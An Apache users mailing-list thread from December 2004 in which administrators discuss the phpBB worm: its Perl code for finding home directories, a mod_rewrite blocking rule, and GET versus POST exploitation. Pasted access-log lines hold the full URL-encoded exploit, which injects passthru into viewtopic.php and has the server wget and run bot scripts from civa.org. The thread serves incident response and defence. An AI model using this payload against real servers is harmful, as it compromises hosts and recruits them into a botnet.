>>checked and corrected to work on Windows:
>>
>> eval{
>> while(my @a = getpwent()) { push(@dirs, $a[7]);}
>> };
>>
>> push(@dirs, '/ ');
>>
>>the getpwent function is not supported on Windows. Actually the entire
>>loop that gets users home directories from the /etc/passwd file is very
>>*nix centric.
>>
>>The author found that out, added the eval statement to prevent the
>>script from crashing on Windows and added the root directory in order to
>>have at least one entry on windows. This last line actually makes the
>>entire loop less important.
>>
>>Additionally, on Windows the worm would affect files on a single disk.
>>As to which disk exactly, it probably depends on the web server
>>attacked, and how PHP and Perl are installed and used with the web
>>server. In some cases, if the web sites and the software do not reside
>>on the same disk, the worm payload will not work.
>>
>>
>>Ofer Shezaf, CTO
>>Breach Security, Inc.
>>Deployable Application Security
>>
>>Tel: +972.9.956.0036 ext.212
>>Cell: +972.54.443.1119
>>ofers@breach.com
>
>At 13:59 +0100 23/12/2004, Anders Henke wrote:
>> > If you cannot fix it (virtual servers) fast for all your clients you could
>>> also try with something like this:
>>>
>>> RewriteEngine On
>>> RewriteCond %{QUERY_STRING} ^(.*)echr(.*) [OR]
>>> RewriteCond %{QUERY_STRING} ^(.*)esystem(.*)
>>> RewriteRule ^.*$ - [F]
>>>
>>> We had some vhosts where this worked just fine. On our systems we didnt
>>> see any valid request with echr and esystem, just be gentle with it, it
>>> works for me, it could work for you ;)
>>
>>This assumes you're seeing GET-requests, but there are other ways
>>(e.g. POST) to exploit such code.
>>
>>GET-requests are so kind as they do show up in full in the web servers
>>access-log and as such, they do document the full exploit code.
>>E.g. just the accesslogs do provide enough information for site owner and
>>administrator to find out what's exactly broken and enables them to
>>perform detailed analysis on even previously unknown exploits as well
>>as reject such malicous code within a mod_rewrite-RewriteRule.
>>
>>Today, most such exploits are sent using HTTP-GET, but there's a fairly
>>low expense for exploit code coders to run these exploits using HTTP-POST.
>>We're lucky that most exploit code coders haven't chosen the struggle to
>>properly encode their exploit-code HTTP-POST-requests, but still keep
>>in mind that a 'plain' Apache cannot filter the payload from HTTP-POST
>>other than rejecting =any= POST-request to 'specific' files like
>>viewtopic.php, which obviously will sooner or later break some application.
>>
>>I've already had a single case where a 'common' insecurity like
>>'include($some_user_supplied_data)' has been exploited using HTTP-POST,
>>so for the administrators out there, it might be a good idea to test and
>>implement mod_security on web servers.
>>As far as I known, the POST-payload analysis of mod_security is currently
>>one of the very few ways to audit and stop potentially malicious
>>HTTP-POST-data from reaching your web server's CGIs.
>
>At 16:10 +0000 24/12/2004, <st...@uptime.org.uk> wrote:
>>
>>>This assumes you're seeing GET-requests, but there are other ways
>>
>>>(e.g. POST) to exploit such code.
>>
>>Whilst I understand your point, it should be noted that this
>>vulnerability in phpBB is susceptible only to GET-based attacks:
>>the vulnerable data is sourced from $HTTP_GET_VARS.
>
>At 19:12 +0100 24/12/2004, Raymond Dijkxhoorn wrote:
>>
>>>Whilst I understand your point, it should be noted that this
>>>vulnerability in phpBB is susceptible only to GET-based attacks:
>>>the vulnerable data is sourced from $HTTP_GET_VARS.
>>
>>And it seems worse, we see even upgraded phpbb2 installs (2.0.11)
>>succesfully and activly being exploited.
>>
>>216.22.10.90 - - [24/Dec/2004:18:42:54 +0100] "GET
>>/phpBB2/viewtopic.php?t=753&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%
>>3B%20cd%20/tmp;wget%20civa.org/pdf/bot;perl%20bot;wget%20civa.org/pdf/
>>ssh.a;perl%20ssh.a%3B%20%65%63%68%6F%20%5F%45%4E%44%5F&highlight=%2527
>>.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53
>>%5B%72%75%73%68%5D%29.%2527 HTTP/1.1" 200 12758 "-"
>>"LWP::Simple/5.803"
>>66.152.98.103 - - [24/Dec/2004:19:02:15 +0100] "GET
>>/phpBB2/viewtopic.php?t=753&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%
>>3B%20cd%20/tmp;wget%20civa.org/pdf/bot;perl%20bot;wget%20civa.org/pdf/
>>ssh.a;perl%20ssh.a%3B%20%65%63%68%6F%20%5F%45%4E%44%5F&highlight=%2527
>>.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53
>>%5B%72%75%73%68%5D%29.%2527 HTTP/1.1" 200 12758 "-"
>>"LWP::Simple/5.79"
>>64.62.187.10 - - [24/Dec/2004:19:04:11 +0100] "GET
>>/phpBB2/viewtopic.php?t=817&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%
>>3B%20cd%20/tmp;wget%20civa.org/pdf/bot;perl%20bot;wget%20civa.org/pdf/
>>ssh.a;perl%20ssh.a%3B%20%65%63%68%6F%20%5F%45%4E%44%5F&highlight=%2527
>>.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53
>>%5B%72%75%73%68%5D%29.%2527 HTTP/1.1" 200 68131 "-"
>>"LWP::Simple/5.63"
>>[24/Dec/2004:19:09:26 +0100] "GET
>>/phpBB2/viewtopic.php?p=7222&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F
>>%3B%20cd%20/tmp;wget%20civa.org/pdf/bot;perl%20bot;wget%20civa.org/pdf
>>/ssh.a;perl%20ssh.a%3B%20%65%63%68%6F%20%5F%45%4E%44%5F&highlight=%252
>>7.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%5
>>3%5B%72%75%73%68%5D%29.%2527 HTTP/1.1" 200 20767 "-"
>>"LWP::Simple/5.803"
>>205.214.85.184 - - [24/Dec/2004:19:10:18 +0100] "GET
>>/phpBB2/viewtopic.php?p=7222&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F
>>%3B%20cd%20/tmp;wget%20civa.org/pdf/bot;perl%20bot;wget%20civa.org/pdf
>>/ssh.a;perl%20ssh.a%3B%20%65%63%68%6F%20%5F%45%4E%44%5F&highlight=%252
>>7.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%5
>>3%5B%72%75%73%68%5D%29.%2527 HTTP/1.1" 200 20875 "-"
>>"LWP::Simple/5.802"
>>
>>Loads of those, and all request the files from civa.org
>>
>>This is on a patched phpbb2, so be aware!!
>
>
>
rgds
>Do anybody have any ideas on this e-mail? My admin inbox was full
>of these e-mails this morning, I don't know if
>they're for real, or what... Can someone please advice? There is
>one phpbb running on the server...
>
>
>HEADERS:
>
>Return-Path: <ww...@iris>
>Received: from mail.the-server.net ([unix socket])
> by iris (Cyrus v2.1.15) with LMTP; Sat, 25 Dec 2004 00:50:24 +0100
>X-Sieve: CMU Sieve 2.2
>Received: from localhost (localhost [127.0.0.1])
> by mail.the-server.net (Postfix) with ESMTP id D8D11CA8E;
> Sat, 25 Dec 2004 00:50:23 +0100 (CET)
>Received: from mail.the-server.net ([127.0.0.1])
> by localhost (iris [127.0.0.1]) (amavisd-new, port 10024) with LMTP
> id 13131-05-2; Sat, 25 Dec 2004 00:48:50 +0100 (CET)
>Received: by mail.the-server.net (Postfix, from userid 30)
> id 00F16C874; Sat, 25 Dec 2004 00:48:48 +0100 (CET)
>Date: Sat, 25 Dec 2004 00:48:48 +0100
>To: postmaster, hostmaster, abuse, admin, root
>Subject: YOUR SERVER HAS BEEN HACKED
>Message-ID: <41...@iris.the-server.net>
>User-Agent: nail 10.5 4/27/03
>MIME-Version: 1.0
>Content-Type: text/plain; charset=us-ascii
>Content-Transfer-Encoding: 7bit
>From: wwwrun (WWW daemon apache)
>X-Virus-Scanned: by Kaspersky, NOD32 & F-Secure at the-server.net
>
>
>MESSAGE BODY:
>
>YOUR SERVER HAS BEEN OWNED VIA PHPBB, PLEASE UPGRADE PHP AND PHPBB IMMEDIATELY
>
>
>---------------------------------------------------------------------
>The official User-To-User support forum of the Apache HTTP Server Project.
>See <URL:http://httpd.apache.org/userslist.html> for more info.
>To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
> " from the digest: users-digest-unsubscribe@httpd.apache.org
>For additional commands, e-mail: users-help@httpd.apache.org
---------------------------------------------------------------------
The official User-To-User support forum of the Apache HTTP Server Project.
See <URL:http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
" from the digest: users-digest-unsubscribe@httpd.apache.org
For additional commands, e-mail: users-help@httpd.apache.org